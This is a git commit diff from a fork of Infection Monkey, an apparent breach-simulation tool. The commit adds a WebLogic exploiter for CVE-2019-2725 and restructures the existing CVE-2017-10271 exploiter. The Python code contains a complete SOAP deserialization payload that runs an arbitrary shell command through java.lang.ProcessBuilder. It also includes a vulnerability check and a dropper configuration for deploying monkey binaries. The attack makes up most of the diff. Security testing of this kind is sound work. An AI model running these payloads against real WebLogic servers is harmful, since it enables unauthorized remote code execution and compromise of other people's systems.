forked from p15670423/monkey
Merge pull request #357 from VakarisZ/wblogic_2019_2725
WebLogic CVE-2019-2725 implemented
This commit is contained in:
commit
001361c863
|
@ -1,3 +1,48 @@
|
|||
from __future__ import print_function
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
import copy
|
||||
|
||||
from requests import post, exceptions
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
|
||||
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
# How long server waits for get request in seconds
|
||||
SERVER_TIMEOUT = 4
|
||||
# How long should we wait after each request in seconds
|
||||
REQUEST_DELAY = 0.1
|
||||
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||
REQUEST_TIMEOUT = 5
|
||||
# How long to wait for response in exploitation. In seconds
|
||||
EXECUTION_TIMEOUT = 15
|
||||
# Malicious requests' headers:
|
||||
HEADERS = {
|
||||
"Content-Type": "text/xml;charset=UTF-8",
|
||||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
||||
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
||||
}
|
||||
|
||||
|
||||
class WebLogicExploiter(HostExploiter):
|
||||
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Weblogic'
|
||||
|
||||
def exploit_host(self):
|
||||
exploiters = [WebLogic20192725, WebLogic201710271]
|
||||
for exploiter in exploiters:
|
||||
if exploiter(self.host).exploit_host():
|
||||
return True
|
||||
|
||||
|
||||
# Exploit based of:
|
||||
# Kevin Kirsche (d3c3pt10n)
|
||||
# https://github.com/kkirsche/CVE-2017-10271
|
||||
|
@ -5,28 +50,8 @@
|
|||
# Luffin from Github
|
||||
# https://github.com/Luffin/CVE-2017-10271
|
||||
# CVE: CVE-2017-10271
|
||||
from __future__ import print_function
|
||||
from requests import post, exceptions
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
# How long server waits for get request in seconds
|
||||
SERVER_TIMEOUT = 4
|
||||
# How long should be wait after each request in seconds
|
||||
REQUEST_DELAY = 0.0001
|
||||
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||
REQUEST_TIMEOUT = 5
|
||||
# How long to wait for response in exploitation. In seconds
|
||||
EXECUTION_TIMEOUT = 15
|
||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||
class WebLogic201710271(WebRCE):
|
||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||
"/wls-wsat/CoordinatorPortType11",
|
||||
"/wls-wsat/ParticipantPortType",
|
||||
"/wls-wsat/ParticipantPortType11",
|
||||
|
@ -34,28 +59,20 @@ URLS = ["/wls-wsat/CoordinatorPortType",
|
|||
"/wls-wsat/RegistrationPortTypeRPC11",
|
||||
"/wls-wsat/RegistrationRequesterPortType",
|
||||
"/wls-wsat/RegistrationRequesterPortType11"]
|
||||
# Malicious request's headers:
|
||||
HEADERS = {
|
||||
"Content-Type": "text/xml;charset=UTF-8",
|
||||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
||||
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
||||
}
|
||||
|
||||
|
||||
class WebLogicExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Weblogic'
|
||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||
|
||||
def __init__(self, host):
|
||||
super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
|
||||
super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
|
||||
'win32': 'monkey32.exe',
|
||||
'win64': 'monkey64.exe'})
|
||||
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||
exploit_config = super(WebLogic201710271, self).get_exploit_config()
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['stop_checking_urls'] = True
|
||||
exploit_config['url_extensions'] = URLS
|
||||
exploit_config['url_extensions'] = WebLogic201710271.URLS
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
|
@ -66,8 +83,8 @@ class WebLogicExploiter(WebRCE):
|
|||
try:
|
||||
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
|
||||
except Exception as e:
|
||||
print('[!] Connection Error')
|
||||
print(e)
|
||||
LOG.error("Connection error: %s" % e)
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
|
@ -196,6 +213,7 @@ class WebLogicExploiter(WebRCE):
|
|||
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
|
||||
we determine if we can exploit by either getting a GET request from host or not.
|
||||
"""
|
||||
|
||||
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
||||
self.local_ip = local_ip
|
||||
self.local_port = local_port
|
||||
|
@ -212,6 +230,7 @@ class WebLogicExploiter(WebRCE):
|
|||
def do_GET():
|
||||
LOG.info('Server received a request from vulnerable machine')
|
||||
self.get_requests += 1
|
||||
|
||||
LOG.info('Server waiting for exploited machine request...')
|
||||
httpd = HTTPServer((self.local_ip, self.local_port), S)
|
||||
httpd.daemon = True
|
||||
|
@ -224,3 +243,82 @@ class WebLogicExploiter(WebRCE):
|
|||
|
||||
def stop(self):
|
||||
self._stopped = True
|
||||
|
||||
|
||||
# Exploit based of:
|
||||
# Andres Rodriguez (acamro)
|
||||
# https://github.com/rapid7/metasploit-framework/pull/11780
|
||||
class WebLogic20192725(WebRCE):
|
||||
URLS = ["_async/AsyncResponseServiceHttps"]
|
||||
|
||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||
|
||||
def __init__(self, host):
|
||||
super(WebLogic20192725, self).__init__(host)
|
||||
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogic20192725, self).get_exploit_config()
|
||||
exploit_config['url_extensions'] = WebLogic20192725.URLS
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['dropper'] = True
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
if 'linux' in self.host.os['type']:
|
||||
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
||||
else:
|
||||
payload = self.get_exploit_payload('cmd', '/c', command)
|
||||
try:
|
||||
resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
|
||||
return resp
|
||||
except Exception as e:
|
||||
LOG.error("Connection error: %s" % e)
|
||||
return False
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
|
||||
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
|
||||
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def get_exploit_payload(cmd_base, cmd_opt, command):
|
||||
"""
|
||||
Formats the payload used to exploit weblogic servers
|
||||
:param cmd_base: What command prompt to use eg. cmd
|
||||
:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
|
||||
:param command: command itself
|
||||
:return: Formatted payload
|
||||
"""
|
||||
empty_payload = '''
|
||||
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
|
||||
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
|
||||
<soapenv:Header>
|
||||
<wsa:Action>xx</wsa:Action>
|
||||
<wsa:RelatesTo>xx</wsa:RelatesTo>
|
||||
<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
|
||||
<void class=\"java.lang.ProcessBuilder\">
|
||||
<array class=\"java.lang.String\" length=\"3\">
|
||||
<void index=\"0\">
|
||||
<string>{cmd_base}</string>
|
||||
</void>
|
||||
<void index=\"1\">
|
||||
<string>{cmd_opt}</string>
|
||||
</void>
|
||||
<void index=\"2\">
|
||||
<string>{cmd_payload}</string>
|
||||
</void>
|
||||
</array>
|
||||
<void method=\"start\"/>
|
||||
</void>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body>
|
||||
<asy:onAsyncDelivery/>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>'''
|
||||
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
|
||||
return payload
|
||||
|
|
|
@ -89,7 +89,7 @@ SCHEMA = {
|
|||
"enum": [
|
||||
"WebLogicExploiter"
|
||||
],
|
||||
"title": "Oracle Web Logic Exploiter"
|
||||
"title": "WebLogic Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
|
|
|
@ -343,9 +343,7 @@ class ReportPageComponent extends AuthComponent {
|
|||
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
|
||||
CVE-2017-5638</a>)</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
|
||||
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
|
||||
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
|
||||
CVE-2017-10271</a>)</li> : null }
|
||||
<li>Oracle WebLogic servers are susceptible to a remote code execution vulnerability.</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.HADOOP] ?
|
||||
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
|
||||
|
@ -889,16 +887,15 @@ class ReportPageComponent extends AuthComponent {
|
|||
generateWebLogicIssue(issue) {
|
||||
return (
|
||||
<li>
|
||||
Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
|
||||
critical patch updates.</a> Or update to the latest version. Vulnerable versions are
|
||||
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
|
||||
Update Oracle WebLogic server to the latest supported version.
|
||||
<CollapsibleWellComponent>
|
||||
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
|
||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
|
||||
className="label label-danger">remote code execution</span> attack.
|
||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
|
||||
className="label label-danger">remote code execution</span> attacks.
|
||||
<br/>
|
||||
The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
|
||||
(subcomponent: WLS Security).
|
||||
The attack was made possible due to one of the following vulnerabilities:
|
||||
<a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271"}> CVE-2017-10271</a> or
|
||||
<a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725"}> CVE-2019-2725</a>
|
||||
</CollapsibleWellComponent>
|
||||
</li>
|
||||
);
|
||||
|
|
Loading…
Reference in New Issue